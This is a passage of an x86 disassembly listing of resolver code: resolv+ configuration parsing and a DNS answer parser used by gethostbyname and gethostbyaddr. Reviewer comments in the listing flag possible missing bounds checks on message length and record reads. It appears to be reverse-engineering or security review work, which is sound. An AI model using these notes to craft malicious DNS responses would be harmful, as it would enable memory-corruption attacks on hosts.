mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFBh jnz short loc_804B118 push 3 push offset aOff ; "off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B118 cmp byte ptr [ebx+3], 0 jz short loc_804B107 movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B118 loc_804B107: ; CODE XREF: init_services_resolv+71Dj mov dword_8078518, 0 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B118: ; CODE XREF: init_services_resolv+703j ; init_services_resolv+717j ... push offset aAlert ; "alert" jmp loc_804B261 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B124: ; CODE XREF: init_services_resolv+66Cj ; init_services_resolv+68Bj ... push offset aAlert ; "alert" jmp loc_804B395 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B130: ; CODE XREF: init_services_resolv+62Ej ; init_services_resolv+64Ej push 7 push offset aReorder ; "reorder" mov eax, [ebp+var_410] push eax call checkbuf mov edx, eax add esp, 0Ch test edx, edx jnz loc_804B2C8 cmp [ebp+var_3F9], 0 jz short loc_804B170 movzx edx, [ebp+var_3F9] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804B2C8 loc_804B170: ; CODE XREF: init_services_resolv+77Fj push offset asc_806791B ; " \t" mov ecx, [ebp+var_410] push ecx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz loc_804B2BC cmp byte ptr [ebx], 0 jz short loc_804B1B2 mov edx, dword_8078FA0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804B19C: ; CODE XREF: init_services_resolv+7D8j movzx eax, byte ptr [ebx] test byte ptr [edx+eax*2+1], 20h jz short loc_804B1B2 inc ebx jz loc_804B2BC cmp byte ptr [ebx], 0 jnz short loc_804B19C loc_804B1B2: ; CODE XREF: init_services_resolv+7B9j ; init_services_resolv+7CCj test ebx, ebx jz loc_804B2BC cmp byte ptr [ebx], 0 jz loc_804B2BC mov edi, ebx xor al, al cld mov 
ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFCh jnz short loc_804B210 push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B210 cmp byte ptr [ebx+2], 0 jz short loc_804B1FE movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B210 loc_804B1FE: ; CODE XREF: init_services_resolv+814j mov dword_807851C, 1 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B210: ; CODE XREF: init_services_resolv+7FAj ; init_services_resolv+80Ej ... mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFBh jnz short loc_804B25C push 3 push offset aOff ; "off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B25C cmp byte ptr [ebx+3], 0 jz short loc_804B24B movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B25C loc_804B24B: ; CODE XREF: init_services_resolv+861j mov dword_807851C, 0 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B25C: ; CODE XREF: init_services_resolv+847j ; init_services_resolv+85Bj ... push offset aReorder ; "reorder" loc_804B261: ; CODE XREF: init_services_resolv+4BDj ; init_services_resolv+601j ... mov ecx, [ebp+var_40C] push ecx push offset aResolvSSComman ; "resolv+: %s: \"%s\" command incorrectly f"... push 0Ch push 0Bh mov eax, dword_8078F9C push eax call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf push ebx push offset aResolvSIsAnInv ; "resolv+: \"%s\" is an invalid keyword\n" push 0Dh push 0Bh mov ecx, dword_8078F9C push ecx call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf add esp, 1Ch jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B2BC: ; CODE XREF: init_services_resolv+7B0j ; init_services_resolv+7CFj ... 
push offset aReorder ; "reorder" jmp loc_804B395 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B2C8: ; CODE XREF: init_services_resolv+772j ; init_services_resolv+792j push 4 push offset aTrim ; "trim" mov eax, [ebp+var_410] push eax call checkbuf mov edx, eax add esp, 0Ch test edx, edx jnz loc_804B3CC cmp [ebp+var_3FC], 0 jz short loc_804B308 movzx edx, [ebp+var_3FC] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804B3CC loc_804B308: ; CODE XREF: init_services_resolv+917j cmp dword_8078520, 3 jg loc_804AA5C push offset asc_806791B ; " \t" mov ecx, [ebp+var_410] push ecx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804B390 jmp short loc_804B335 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B334: ; CODE XREF: init_services_resolv+960j ; init_services_resolv+965j inc ebx loc_804B335: ; CODE XREF: init_services_resolv+957j cmp byte ptr [ebx], 20h jz short loc_804B334 cmp byte ptr [ebx], 9 jz short loc_804B334 cmp byte ptr [ebx], 0 jz short loc_804B390 push ebx mov eax, [ebp+var_408] push eax call strcpy mov eax, [ebp+var_408] mov ecx, dword_8078520 mov ds:dword_807A348[ecx*4], eax inc dword_8078520 mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx mov [ebp+var_414], edx add [ebp+var_408], edx add esp, 8 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B390: ; CODE XREF: init_services_resolv+955j ; init_services_resolv+96Aj push offset aTrim ; "trim" loc_804B395: ; CODE XREF: init_services_resolv+4C9j ; init_services_resolv+60Dj ... mov eax, [ebp+var_40C] push eax push offset aResolvSSComman ; "resolv+: %s: \"%s\" command incorrectly f"... 
push 0Ch push 0Bh mov ecx, dword_8078F9C push ecx loc_804B3AC: ; CODE XREF: init_services_resolv+19Ej call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf add esp, 10h jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B3CC: ; CODE XREF: init_services_resolv+90Aj ; init_services_resolv+92Aj push offset asc_806791B ; " \t" mov eax, [ebp+var_410] push eax call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804B3E9 mov byte ptr [ebx], 0 loc_804B3E9: ; CODE XREF: init_services_resolv+A0Cj mov ecx, [ebp+var_410] push ecx push offset aResolvSIsAnInv ; "resolv+: \"%s\" is an invalid keyword\n" push 0Dh push 0Bh mov eax, dword_8078F9C push eax call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf add esp, 0Ch jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B41C: ; CODE XREF: init_services_resolv+A3j mov ds:dword_8079DD4[esi*4], 0 mov ecx, [ebp+var_404] push ecx call fclose add esp, 4 loc_804B436: ; CODE XREF: init_services_resolv+70j push offset aResolv_serv_or ; "RESOLV_SERV_ORDER" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz loc_804B542 xor esi, esi push offset asc_8067950 ; " ,;:" push ebx call strtok mov ebx, eax add esp, 8 test ebx, ebx jz loc_804B542 nop loc_804B468: ; CODE XREF: init_services_resolv+B59j push 4 push offset aBind ; "bind" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B4B0 cmp byte ptr [ebx+4], 0 jz short loc_804B492 movzx edx, byte ptr [ebx+4] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B4B0 loc_804B492: ; CODE XREF: init_services_resolv+AA8j mov ds:dword_8079DD4[esi*4], 1 inc esi test byte ptr dword_807854C, 1 jnz short loc_804B51E call res_init jmp short loc_804B51E ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B4B0: ; CODE XREF: init_services_resolv+AA2j ; 
init_services_resolv+AB8j push 5 push offset aHosts ; "hosts" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B4E8 cmp byte ptr [ebx+5], 0 jz short loc_804B4DA movzx edx, byte ptr [ebx+5] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B4E8 loc_804B4DA: ; CODE XREF: init_services_resolv+AF0j mov ds:dword_8079DD4[esi*4], 2 jmp short loc_804B51D ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804B4E8: ; CODE XREF: init_services_resolv+AEAj ; init_services_resolv+B00j push 3 push offset aNis ; "nis" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B51E cmp byte ptr [ebx+3], 0 jz short loc_804B512 movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B51E loc_804B512: ; CODE XREF: init_services_resolv+B28j mov ds:dword_8079DD4[esi*4], 3 loc_804B51D: ; CODE XREF: init_services_resolv+B0Dj inc esi loc_804B51E: ; CODE XREF: init_services_resolv+ACDj ; init_services_resolv+AD4j ... push offset asc_8067950 ; " ,;:" push 0 call strtok mov ebx, eax add esp, 8 test ebx, ebx jnz loc_804B468 mov ds:dword_8079DD4[esi*4], 0 loc_804B542: ; CODE XREF: init_services_resolv+A6Fj ; init_services_resolv+A89j push offset aResolv_spoof_c ; "RESOLV_SPOOF_CHECK" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz loc_804B626 push 4 push offset aWarn ; "warn" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B59C cmp byte ptr [ebx+4], 0 jz short loc_804B583 movzx edx, byte ptr [ebx+4] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B59C loc_804B583: ; CODE XREF: init_services_resolv+B99j mov dword_8078514, 1 mov dword_8078518, 1 jmp loc_804B626 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B59C: ; CODE XREF: init_services_resolv+B93j ; init_services_resolv+BA9j push 3 push offset aOff ; "off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B5DC cmp byte ptr [ebx+3], 0 jz short loc_804B5C6 movzx edx, byte ptr 
[ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B5DC loc_804B5C6: ; CODE XREF: init_services_resolv+BDCj mov dword_8078514, 0 mov dword_8078518, 0 jmp short loc_804B626 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B5DC: ; CODE XREF: init_services_resolv+BD6j ; init_services_resolv+BECj push 8 push offset aWarnOff ; "warn off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B61C cmp byte ptr [ebx+8], 0 jz short loc_804B606 movzx edx, byte ptr [ebx+8] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B61C loc_804B606: ; CODE XREF: init_services_resolv+C1Cj mov dword_8078514, 1 mov dword_8078518, 0 jmp short loc_804B626 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B61C: ; CODE XREF: init_services_resolv+C16j ; init_services_resolv+C2Cj mov dword_8078514, 1 loc_804B626: ; CODE XREF: init_services_resolv+B7Bj ; init_services_resolv+BBFj ... push offset aResolv_multi ; "RESOLV_MULTI" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz short loc_804B67A push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B670 cmp byte ptr [ebx+2], 0 jz short loc_804B663 movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B670 loc_804B663: ; CODE XREF: init_services_resolv+C79j mov dword_8078510, 1 jmp short loc_804B67A ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804B670: ; CODE XREF: init_services_resolv+C73j ; init_services_resolv+C89j mov dword_8078510, 0 loc_804B67A: ; CODE XREF: init_services_resolv+C5Fj ; init_services_resolv+C95j push offset aResolv_reorder ; "RESOLV_REORDER" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz short loc_804B6CE push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B6C4 cmp byte ptr [ebx+2], 0 jz short loc_804B6B7 movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B6C4 
loc_804B6B7: ; CODE XREF: init_services_resolv+CCDj mov dword_807851C, 1 jmp short loc_804B6CE ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804B6C4: ; CODE XREF: init_services_resolv+CC7j ; init_services_resolv+CDDj mov dword_807851C, 0 loc_804B6CE: ; CODE XREF: init_services_resolv+CB3j ; init_services_resolv+CE9j push offset aResolv_add_tri ; "RESOLV_ADD_TRIM_DOMAINS" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz short loc_804B74F push offset asc_8067950 ; " ,;:" push ebx jmp short loc_804B741 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B6EC: ; CODE XREF: init_services_resolv+D75j cmp dword_8078520, 3 jg short loc_804B73A push ebx mov eax, [ebp+var_408] push eax call strcpy mov eax, [ebp+var_408] mov ecx, dword_8078520 mov ds:dword_807A348[ecx*4], eax inc dword_8078520 mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx mov [ebp+var_414], edx add [ebp+var_408], edx add esp, 8 loc_804B73A: ; CODE XREF: init_services_resolv+D1Bj push offset asc_8067950 ; " ,;:" push 0 loc_804B741: ; CODE XREF: init_services_resolv+D0Fj call strtok mov ebx, eax add esp, 8 test ebx, ebx jnz short loc_804B6EC loc_804B74F: ; CODE XREF: init_services_resolv+D07j push offset aResolv_overrid ; "RESOLV_OVERRIDE_TRIM_DOMAINS" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz loc_804B7E7 mov dword_8078520, 0 mov [ebp+var_408], offset unk_807A358 push offset asc_8067950 ; " ,;:" push ebx jmp short loc_804B7D9 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B784: ; CODE XREF: init_services_resolv+E0Dj cmp dword_8078520, 3 jg short loc_804B7D2 push ebx mov eax, [ebp+var_408] push eax call strcpy mov eax, [ebp+var_408] mov ecx, dword_8078520 mov ds:dword_807A348[ecx*4], eax inc dword_8078520 mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx mov [ebp+var_414], edx add [ebp+var_408], edx add esp, 8 
loc_804B7D2: ; CODE XREF: init_services_resolv+DB3j
        ; Tail of init_services_resolv (its beginning lies above this excerpt):
        ; fetch the next token with strtok(0, " ,;:") and loop while one is returned.
        push offset asc_8067950 ; " ,;:"
        push 0
loc_804B7D9: ; CODE XREF: init_services_resolv+DA8j
        call strtok
        mov ebx, eax
        add esp, 8
        test ebx, ebx
        jnz short loc_804B784
loc_804B7E7: ; CODE XREF: init_services_resolv+D88j
        mov dword_80784F8, 1            ; "already initialised" flag; callers test it before calling init_services_resolv
        lea esp, [ebp+var_420]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
init_services_resolv endp
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding bytes between functions
; =============== S U B R O U T I N E =======================================
; getanswer(arg_0, arg_4, arg_8, arg_C, arg_10)
;
; Parses a name-service response held in the buffer arg_0 (length arg_4) and
; fills the static result block that starts at dword_8079E74. Returns
; offset dword_8079E74 on success, or 0 with dword_807E788 set (2 or 3).
;
; Call sites visible in this listing:
;   gethostbyname: getanswer(var_400, <res_search result>, name, 1, 1)
;   gethostbyaddr: getanswer(var_400, <sub_804DFE0 result>, query string, 1, 0Ch)
;
; NOTE(review): the log strings ("gethostby*.getanswer: asked for ...") and the
; 0Ch-byte header skip suggest a DNS response; DNS field names used in the
; comments below (question/answer counts, record type/class, types 1/5/0Ch as
; A/CNAME/PTR) are inferred from the standard DNS layout - confirm.
; NOTE(review): dword_8079E74.. is written like a struct hostent (name, alias
; list, address type, length, address list) and dword_807E788 like h_errno;
; presumably that is what they are.
;
; Attributes: bp-based frame hidden
getanswer proc near ; CODE XREF: gethostbyname+180p ; gethostbyaddr+105p
var_144 = byte ptr -144h                ; only used to restore esp in the epilogue
var_138 = dword ptr -138h               ; scratch: string length
var_130 = dword ptr -130h               ; name that type-0Ch records are compared against (starts as arg_8)
var_12C = dword ptr -12Ch               ; number of "too many addresses" events
var_128 = dword ptr -128h               ; error counter; non-zero stops the record loop
var_124 = dword ptr -124h               ; number of accepted answer records
var_120 = dword ptr -120h               ; records still to process
var_11C = dword ptr -11Ch               ; bytes left in the static name buffer
var_118 = dword ptr -118h               ; second 16-bit field of the current record
var_114 = dword ptr -114h               ; cursor in the address-pointer list (dword_8079DE4)
var_110 = dword ptr -110h               ; cursor in the alias-pointer list (dword_8079E88)
var_10C = dword ptr -10Ch               ; write cursor in the static buffer unk_8079F14
var_108 = dword ptr -108h               ; end-of-message pointer (arg_0 + arg_4)
var_104 = byte ptr -104h                ; stack scratch, passed with size 101h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
        push ebp
        mov ebp, esp
        sub esp, 138h
        push edi
        push esi
        push ebx
        mov [ebp+var_12C], 0
        mov eax, [ebp+arg_8]
        mov [ebp+var_130], eax
        mov ds:dword_8079E74, 0
        ; NOTE(review): arg_4 is taken as the message length as-is; no clamp to
        ; the size of the caller's buffer is visible in this function.
        mov edx, [ebp+arg_0]
        add edx, [ebp+arg_4]
        mov [ebp+var_108], edx
        mov eax, [ebp+arg_0]
        mov ax, [eax+6]                 ; 16-bit field at offset 6, byte-swapped below
        xchg al, ah
        movzx edx, ax
        mov [ebp+var_120], edx          ; used as the record count for the loop
        mov eax, [ebp+arg_0]
        mov ax, [eax+4]                 ; 16-bit field at offset 4, byte-swapped below
        xchg al, ah
        mov [ebp+var_10C], offset unk_8079F14
        mov [ebp+var_11C], 401h
        mov esi, [ebp+arg_0]
        add esi, 0Ch                    ; esi = read cursor, just past the 0Ch-byte header
        cmp ax, 1                       ; the offset-4 field must be exactly 1
        jz short loc_804B880
        mov ds:dword_807E788, 3
        jmp loc_804BE9E
; ---------------------------------------------------------------------------
        align 4
loc_804B880: ; CODE XREF: getanswer+6Ej
        ; sub_804D02C(arg_0, var_108, esi, var_10C, var_11C): result < 0 is
        ; treated as failure, otherwise it is added to the read cursor.
        ; Presumably a compressed-name expander (dn_expand-like) - confirm.
        mov edx, [ebp+var_11C]
        push edx
        mov eax, [ebp+var_10C]
        push eax
        push esi
        mov edx, [ebp+var_108]
        push edx
        mov eax, [ebp+arg_0]
        push eax
        call sub_804D02C
        mov ebx, eax
        add esp, 14h
        test ebx, ebx
        jge short loc_804B8B8
        mov ds:dword_807E788, 3
        jmp loc_804BE9E
; ---------------------------------------------------------------------------
        align 4
loc_804B8B8: ; CODE XREF: getanswer+A6j
        call sub_805E954                ; no arguments; purpose not visible here
        lea esi, [esi+ebx+4]            ; skip the expanded name plus 4 more bytes
        cmp [ebp+arg_10], 1
        jnz short loc_804B8FF
        ; arg_10 == 1: keep the name just written at var_10C as the result name.
        xor cl, cl
        mov edi, [ebp+var_10C]
        mov al, cl
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb
        mov ebx, ecx
        not ebx                         ; ebx = strlen + 1
        mov edx, [ebp+var_10C]
        mov ds:dword_8079E74, edx
        add edx, ebx
        mov [ebp+var_10C], edx
        sub [ebp+var_11C], ebx
        mov eax, ds:dword_8079E74
        mov [ebp+arg_8], eax            ; later log messages use this copy of the name
loc_804B8FF: ; CODE XREF: getanswer+C5j
        ; Reset both pointer lists to empty and clear the counters.
        mov [ebp+var_110], offset dword_8079E88
        mov ds:dword_8079E88, 0
        mov ds:dword_8079E78, offset dword_8079E88
        mov [ebp+var_114], offset dword_8079DE4
        mov ds:dword_8079DE4, 0
        mov ds:dword_8079E84, offset dword_8079DE4
        mov [ebp+var_124], 0
        mov [ebp+var_128], 0
        ; Loop guard: records remaining and read cursor still below var_108.
        mov eax, [ebp+var_120]
        dec [ebp+var_120]
        test eax, eax
        jle loc_804BE14
        cmp [ebp+var_108], esi
        jbe loc_804BE14
        nop
loc_804B970: ; CODE XREF: getanswer+60Ej
        ; --- top of the per-record loop: expand the record's owner name ---
        mov edx, [ebp+var_11C]
        push edx
        mov eax, [ebp+var_10C]
        push eax
        push esi
        mov edx, [ebp+var_108]
        push edx
        mov eax, [ebp+arg_0]
        push eax
        call sub_804D02C
        mov ebx, eax
        add esp, 14h
        test ebx, ebx
        jl loc_804BD6C
        add esi, ebx
        ; Three 16-bit reads through sub_804D6B8 at esi, esi+2 and esi+8, then
        ; esi ends up 0Ah bytes further on.
        ; NOTE(review): no comparison against var_108 is visible between the name
        ; expansion above and these reads; the only end-of-message test is the
        ; loop guard. Confirm whether a truncated message can reach this point.
        push esi
        call sub_804D6B8
        mov ecx, eax
        movzx edi, cx                   ; edi = first field (compared with 1, 5, 0Ch below)
        add esi, 2
        push esi
        call sub_804D6B8
        mov ecx, eax
        and ecx, 0FFFFh
        mov [ebp+var_118], ecx          ; second field, must equal arg_C
        add esi, 6
        push esi
        call sub_804D6B8
        mov ecx, eax
        movzx ebx, cx                   ; ebx = third field, used as the data length
        add esi, 2
        add esp, 0Ch
        mov edx, [ebp+arg_C]
        cmp [ebp+var_118], edx
        jnz loc_804BDA7                 ; mismatch: skip ebx bytes and continue
        cmp [ebp+arg_10], 1
        jnz loc_804BB08
        cmp edi, 5
        jnz loc_804BB08
        ; arg_10 == 1 and record field == 5: alias handling.
        cmp [ebp+var_110], offset unk_8079F10   ; alias list full -> ignore record
        jnb loc_804BDEF
        push 101h
        lea eax, [ebp+var_104]
        push eax
        push esi
        mov edx, [ebp+var_108]
        push edx
        mov eax, [ebp+arg_0]
        push eax
        call sub_804D02C                ; expand the record data into var_104 (size 101h)
        mov ebx, eax
        add esp, 14h
        test ebx, ebx
        jl loc_804BD6C
        add esi, ebx
        cmp ds:dword_8079E74, 0
        jz short loc_804BA90
        ; sub_80565F8(dword_8079E74, var_10C): non-zero means the owner name
        ; differs from the current result name (presumably a case-insensitive
        ; string compare - confirm); the record is then logged and ignored.
        mov edx, [ebp+var_10C]
        push edx
        mov eax, ds:dword_8079E74
        push eax
        call sub_80565F8
        mov ecx, eax
        add esp, 8
        test ecx, ecx
        jz short loc_804BA90
        mov edx, [ebp+var_10C]
        push edx
        mov eax, ds:dword_8079E74
        push eax
        push offset aGethostby_geta ; "gethostby*.getanswer: asked for \"%s\", g"...
; Interior of getanswer. These pushes complete the arguments of the catgets
; call; the format-string push immediately precedes this point in the listing.
        push 1Bh
        push 0Bh
        mov edx, dword_8078F9C
        push edx
        call catgets                    ; catgets(dword_8078F9C, 0Bh, 1Bh, default text)
        add esp, 10h
        mov ecx, eax
        push ecx
        push 25h
        call sub_8054EB0                ; (25h, text, ...) - presumably a syslog-style logger; confirm
        add esp, 10h
        jmp loc_804BDEF
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0                  ; padding
; ---------------------------------------------------------------------------
loc_804BA90: ; CODE XREF: getanswer+239j ; getanswer+254j
        ; Accept the alias: record the owner name (already at var_10C) in the
        ; alias list, then make the expanded target in var_104 the result name.
        mov edx, [ebp+var_10C]
        mov eax, [ebp+var_110]
        mov [eax], edx
        add eax, 4
        mov [ebp+var_110], eax
        mov edi, [ebp+var_10C]
        xor al, al
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb
        mov ebx, ecx
        not ebx                         ; strlen(owner name) + 1
        add edx, ebx
        mov [ebp+var_10C], edx
        sub [ebp+var_11C], ebx
        lea edi, [ebp+var_104]
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb                     ; al is still 0 from above
        mov ebx, ecx
        not ebx                         ; strlen(var_104) + 1
        ; Space check before the copy. The compare is signed, so a remaining
        ; count that has gone negative also takes the error path.
        cmp [ebp+var_11C], ebx
        jl loc_804BD6C
        lea edx, [ebp+var_104]
        push edx
        mov eax, [ebp+var_10C]
        push eax
        call strcpy
        mov edx, [ebp+var_10C]
        mov ds:dword_8079E74, edx
        jmp short loc_804BB86
; ---------------------------------------------------------------------------
loc_804BB08: ; CODE XREF: getanswer+1E7j ; getanswer+1F0j
        ; arg_10 == 0Ch and record field == 5: same expansion, but the target
        ; becomes the name later type-0Ch records are compared with (var_130).
        cmp [ebp+arg_10], 0Ch
        jnz loc_804BB9C
        cmp edi, 5
        jnz loc_804BB9C
        push 101h
        lea eax, [ebp+var_104]
        push eax
        push esi
        mov edx, [ebp+var_108]
        push edx
        mov eax, [ebp+arg_0]
        push eax
        call sub_804D02C
        mov ebx, eax
        add esp, 14h
        test ebx, ebx
        jl loc_804BD6C
        add esi, ebx
        lea edi, [ebp+var_104]
        xor al, al
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb
        mov ebx, ecx
        not ebx
        cmp [ebp+var_11C], ebx          ; signed space check before strcpy
        jl loc_804BD6C
        lea edx, [ebp+var_104]
        push edx
        mov eax, [ebp+var_10C]
        push eax
        call strcpy
        mov edx, [ebp+var_10C]
        mov [ebp+var_130], edx
loc_804BB86: ; CODE XREF: getanswer+306j
